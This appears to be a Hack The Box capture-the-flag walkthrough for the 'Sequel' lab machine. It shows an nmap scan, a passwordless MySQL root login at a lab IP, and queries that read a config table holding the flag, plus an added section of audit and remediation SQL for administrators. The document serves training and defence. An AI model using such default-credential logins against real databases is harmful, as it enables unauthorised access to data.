
Sequel


Enumeration


As usual, let's start with our nmap scan:

nmap -sV -sC IP

-sV : service and version detection

-sC : script scan using the default set of scripts


Replace IP with the IP address of the target machine (Sequel).

Note: The IP addresses of the target machines are always changing, so make sure you type the correct one. You can find it on your Hack The Box account.

Port 3306 is usually associated with the MySQL protocol. MySQL is a database management service, used for tasks such as creating, modifying or deleting databases.



Foothold


Type this command to get more information on how to use the mysql command:

mysql --help

We find that we need to add -u followed by the username, and -h followed by the hostname or IP.

We don't know any username, but we can try our luck with the user root:

mysql -u root -h 10.129.231.168

Notice that we were not even asked for a password, meaning that the administrator forgot to set up a password. We are in luck!
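
From the administrator's side, this misconfiguration can be found and fixed with a few statements run on the database server. This is an added example, not part of the original walkthrough; the account 'root'@'%' and the password placeholder are assumptions, so use the rows your own audit returns.

```sql
-- Added example (not from the original walkthrough).
-- Run as an administrative user on the database server.

-- 1. Accounts that can log in with no password at all.
--    Accounts using socket authentication (auth_socket on MySQL,
--    unix_socket on MariaDB) are excluded: their credential column
--    may be empty, but they only accept a matching local OS user,
--    not a network login like the one shown above.
SELECT user, host, plugin
FROM mysql.user
WHERE (authentication_string IS NULL OR authentication_string = '')
  AND plugin NOT IN ('auth_socket', 'unix_socket');

-- 2. root accounts that accept connections from other hosts.
SELECT user, host, plugin
FROM mysql.user
WHERE user = 'root'
  AND host NOT IN ('localhost', '127.0.0.1', '::1');

-- 3. Remediation for an account returned by the audits above.
--    'root'@'%' is an assumed example row; substitute the real
--    user/host pair. The password is a placeholder.
ALTER USER 'root'@'%' IDENTIFIED BY '<strong-unique-password>';

-- Alternative to step 3 when remote root is not needed: remove the
-- remote account and keep only the local one.
-- DROP USER 'root'@'%';

-- 4. Re-run query 1 afterwards; it should return no rows.
```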


Now that we are in the database, let's type:

show databases;

This command lists all the databases available.


use htb;

This command tells the server that we want to use the database called htb.


show tables;

This command shows all the tables available in the database htb.


SELECT * from config;

This means we want to select and show everything (all rows and columns) in the table config.

Congratulations! You got the flag!
